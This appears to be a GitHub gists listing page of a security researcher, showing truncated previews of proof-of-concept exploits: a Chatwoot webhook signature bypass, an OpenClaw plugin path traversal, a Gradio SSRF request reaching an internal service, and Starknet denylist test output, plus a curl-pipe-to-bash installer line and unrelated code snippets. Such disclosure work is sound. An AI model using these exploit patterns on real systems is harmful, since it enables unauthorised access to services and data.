curl -fsSL https://tachyon.so/install.sh | bashRequires Python 3.11+. The script installs pipx if needed.
Aakash Japi logicx24
logicx24
/ poc_minimal.py
Created
February 12, 2026 21:59
PoC: Chatwoot Instagram & WhatsApp webhook signature bypass — unauthenticated message injection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| PoC: Chatwoot Instagram & WhatsApp webhook signature bypass — unauthenticated message injection. | |
| Spins up Chatwoot via Docker, sends unsigned webhook payloads, and verifies | |
| that attacker-crafted messages are stored in the database as legitimate | |
| incoming customer messages. | |
| Requires: Docker with compose v2, ports 3100/5433/6380 free. | |
| Usage: python3 poc_minimal.py [--keep] |
logicx24
/ gist:c4fcb32a3f86f679b27aa4b72794dc5c
Last active
February 3, 2026 10:13
Tachyon CLI Quick Start
logicx24
/ poc-path-traversal-plugin-install.mjs
Last active
February 2, 2026 08:49
OpenClaw: Path Traversal in Plugin Installation (CWE-22)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env node | |
| import { execSync } from "node:child_process"; | |
| import fs from "node:fs"; | |
| import path from "node:path"; | |
| import os from "node:os"; | |
| const pocDir = path.join(os.tmpdir(), "openclaw-traversal-poc-" + Date.now()); | |
| const configDir = path.join(os.homedir(), ".openclaw"); | |
| const extensionsDir = path.join(configDir, "extensions"); |
logicx24
/ exploit.py
Last active
February 1, 2026 08:50
Gradio SSRF PoC - proxy_url injection via gr.load()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """Exploit: access internal service through victim's proxy endpoint.""" | |
| import httpx | |
| VICTIM = "http://127.0.0.1:7860" | |
| INTERNAL = "http://127.0.0.1:9999/" | |
| # SSRF via /gradio_api/proxy=<url> | |
| resp = httpx.get(f"{VICTIM}/gradio_api/proxy={INTERNAL}") |
logicx24
/ output.json
Created
November 27, 2025 04:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "timestamp": "2025-11-26T21:42:32.750Z", | |
| "denylistedRecipient": { | |
| "hex": "0x00000000000000000000000000000000000000000000000000000000deadbeef", | |
| "decimal": "3735928559" | |
| }, | |
| "contracts": { | |
| "stablecoin": "0x26a1971b64ed77c82ec85fc83bc3d1a1ea867e776e61be6a8872c321ecd87b6", | |
| "tokenMessengerMinter": "0x1a8aef65113f8a4c46ac2793e3b02e9d32cc43a79b171df50d4fcbd684ce636", | |
| "messageTransmitter": "0x4356cdc4411523c5cc98a2e09c723ddee4e051b615d3cf12bc152b49c20e45f" |
logicx24
/ output.log
Created
November 27, 2025 04:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Starting Starknet node using runtime: docker | |
| >> Launching container via docker compose -f /Users/aakashjapi/projects/starknet-cctp/repros/denylist_poc/devnet/docker-compose.yml up | |
| WARN[0000] /Users/aakashjapi/projects/starknet-cctp/repros/denylist_poc/devnet/docker-compose.yml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion | |
| [+] Building 0.6s (17/17) FINISHED | |
| ... 0.0s | |
| => resolving provenance for metadata file 0.0s | |
| [+] Running 3/3 | |
| ✔ devnet-starknet-devnet Built |
logicx24
/ vibecoder-review.md
Created
November 18, 2025 02:23
| name | description |
|---|---|
vibecoder-review |
Practical OWASP-focused security review for fast-moving codebases built with AI assistance - catches common patterns where speed trumps security (exposed secrets, auth bypasses, missing access controls, injection vulnerabilities) |
Target audience: Fast-moving codebases built by developers using AI assistance, rapid prototyping tools, and modern frameworks. These projects prioritize speed and iteration, often skipping security fundamentals.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.util.ArrayList; | |
| class BlockingQueue { | |
| private ArrayList<Character> queue; | |
| public BlockingQueue() { | |
| queue = new ArrayList<Character>(); | |
| } | |
| public synchronized String take() { |
logicx24
/ wordCount.py
Last active
August 29, 2015 14:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sys import argv | |
| import os | |
| def inputFunc(): | |
| if len(argv) >= 2: | |
| if os.path.isfile(argv[1]): | |
| text = open(argv[1]).read() | |
| else: | |
| print('not a file') | |
| else: |